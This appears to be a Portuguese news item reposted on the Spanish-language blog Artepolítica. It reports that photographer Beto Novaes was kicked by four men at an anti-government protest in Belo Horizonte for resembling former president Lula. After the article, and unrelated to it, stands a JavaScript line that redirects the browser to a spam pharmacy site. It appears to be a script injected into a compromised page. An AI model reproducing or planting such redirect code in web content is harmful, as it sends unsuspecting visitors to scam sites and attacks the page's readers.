Fotógrafo é agredido durante protesto em BH por se parecer com Lula

Facebook/Reprodução
Um fotógrafo do jornal «Estado de Minas» foi agredido durante as manifestações desse domingo (12) contra o governo federal em Belo Horizonte. O motivo seria porque Beto Novaes se parece com o ex-presidente Lula.
A agressão teria acontecido quando ele estava próximo de uma mulher que pediu para ser fotografada. Em seguida, a mulher teria dito que ele se parecia muito com o ex-presidente Lula em razão de sua barba e cabelos.
Leia mais notícias no R7 MG
Neste momento, quatro homens que estavam próximos mandaram que o fotógrafo fosse embora e o agrediram com chutes. Entretanto, ele não teve como registrar as agressões com sua câmera e também não registrou Boletim de Ocorrência.
A história foi relatada por um colega do repórter fotográfico, o cartunista Quinho. Ele descreveu como tudo aconteceu e, em entrevista ao jornal «O Tempo», Beto Novaes confirmou as agressões e disse que é comum ser comparado a Lula e que, geralmente, recebe pedidos para tirar fotos com as pessoas devido à sua semelhança com o ex-presidente. Ele foi procurado pela reportagem do R7, mas não retornou às ligações.

window.location = «http://cheap-pills-norx.com»;

Acerca de Artepolítica

El usuario Artepolítica es la firma común de los que hacemos este blog colectivo.

Ver todas las entradas de Artepolítica →

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *